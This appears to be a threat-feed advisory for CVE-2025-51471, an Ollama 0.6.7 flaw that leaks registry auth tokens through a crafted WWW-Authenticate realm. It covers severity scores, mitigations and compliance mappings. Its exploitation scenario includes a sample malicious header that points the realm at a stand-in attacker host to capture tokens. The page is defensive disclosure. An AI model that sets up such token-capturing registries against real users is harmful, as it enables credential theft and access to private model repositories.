AI Threat Alert

CVE-2025-51471: Ollama: auth token hijack via crafted WWW-Authenticate

MEDIUM PoC AVAILABLE CISA: TRACK*
Published July 22, 2025
CISO Take

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

What is the risk?

Effective risk is moderate-to-high in enterprise AI environments despite the medium CVSS score. The AC:H and UI:R modifiers reflect that exploitation requires a malicious registry interaction, but in practice many teams pull models ad-hoc from community sources, making social-engineering the pull trivial. The scope change (S:C) and C:H impact are the critical signals: a stolen registry token can pivot to private model repositories, exposing proprietary fine-tuned models or access to broader MLOps infrastructure. No public PoC exploitation observed and not in CISA KEV, but the gecko.security writeup lowers the bar significantly.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Ollama pip No patch
174.6K 1.6K dependents Pushed 3d ago 12% patched ~0d to patch Full package profile →

Do you use Ollama? You're affected.

How severe is it?

CVSS 3.1
6.9 / 10
EPSS
3.8%
chance of exploitation in 30 days
Higher than 89% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC High
PR None
UI Required
S Changed
C High
I Low
A None

What should I do?

5 steps

  1. PATCH

    Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750).

  2. RESTRICT

    Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries.

  3. AUDIT

    Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs.

  4. ISOLATE

    Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials.

  5. DETECT

    Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Auth Bypass Data Extraction Supply Chain Inference API Model AML.T0010.003 AML.T0012 AML.T0049 AML.T0091.000 AML.T0106

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
6.1.2 - AI risk assessment 8.4 - AI system operation and monitoring
NIST AI RMF
GOVERN-1.1 - Policies for AI risk management MANAGE-2.2 - Risk treatment for AI system vulnerabilities
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-51471?

Ollama 0.6.7 leaks authentication tokens to attacker-controlled registries when a user pulls a model: a malicious realm value in WWW-Authenticate redirects the token request to an adversary's server. Any environment pulling models from untrusted or public registries is exposed. Patch immediately or restrict model pulling to verified internal registries via network policy.

Is CVE-2025-51471 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-51471, increasing the risk of exploitation.

How to fix CVE-2025-51471?

1. PATCH: Upgrade Ollama beyond 0.6.7 immediately (track https://github.com/ollama/ollama/releases for the fix in PR #10750). 2. RESTRICT: Block outbound connections from Ollama instances to non-approved registry endpoints at the network layer; whitelist only internal or verified registries. 3. AUDIT: Review logs for /api/pull requests to external registries; look for WWW-Authenticate headers pointing to unexpected realm URLs. 4. ISOLATE: Run Ollama instances without access to production credentials; use short-lived or registry-scoped tokens rather than long-lived credentials. 5. DETECT: Alert on Ollama processes making authentication requests to domains not matching your approved registry list.

What systems are affected by CVE-2025-51471?

This vulnerability affects the following AI/ML architecture patterns: LLM inference (Ollama self-hosted), Model serving infrastructure, CI/CD model delivery pipelines, MLOps automation (automated model pulls), Local AI development environments.

What is the CVSS score for CVE-2025-51471?

CVE-2025-51471 has a CVSS v3.1 base score of 6.9 (MEDIUM). The EPSS exploitation probability is 3.84%.

What is the AI security impact?

Affected AI Architectures

LLM inference (Ollama self-hosted)Model serving infrastructureCI/CD model delivery pipelinesMLOps automation (automated model pulls)Local AI development environments

MITRE ATLAS Techniques

AML.T0010.003 Model
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0091.000 Application Access Token
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: 6.1.2, 8.4
NIST AI RMF: GOVERN-1.1, MANAGE-2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

Cross-Domain Token Exposure in server.auth.getAuthorizationToken in Ollama 0.6.7 allows remote attackers to steal authentication tokens and bypass access controls via a malicious realm value in a WWW-Authenticate header returned by the /api/pull endpoint.

Exploitation Scenario

An adversary registers a namespace on a public model hub or stands up a malicious Ollama-compatible registry. They socially engineer a developer or automate a pull via a poisoned model reference (e.g., in a requirements file, LLMOps config, or CI workflow). When Ollama calls /api/pull, the malicious registry responds with WWW-Authenticate: Bearer realm='https://attacker.com/token'. Ollama's getAuthorizationToken follows the realm URL without domain validation and forwards the user's authentication credentials. The attacker captures the token and uses it to authenticate to the victim's legitimate private model registry, exfiltrating proprietary fine-tuned models or injecting poisoned replacements.

Weaknesses (CWE)

CWE-345 Insufficient Verification of Data Authenticity CWE-384 Session Fixation

CWE-345 — Insufficient Verification of Data Authenticity: The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N

References

Timeline

Published
July 22, 2025
Last Modified
October 17, 2025
First Seen
July 22, 2025

Related Vulnerabilities

CRITICAL CVE-2026-46339 10.0

9router: unauthenticated RCE exposes LLM API keys

Same package: ollama
CRITICAL CVE-2026-42248 9.8

Ollama: silent auto-update bypasses signature check on Windows

Same package: ollama
CRITICAL CVE-2025-63389 9.8

ollama: Missing Auth allows unauthenticated access

Same package: ollama
CRITICAL CVE-2026-42249 9.8

Ollama: path traversal + unsigned update = silent RCE

Same package: ollama
CRITICAL CVE-2026-7482 9.1

Ollama: heap OOB read leaks API keys and chat data

Same package: ollama
Back to Threat Feed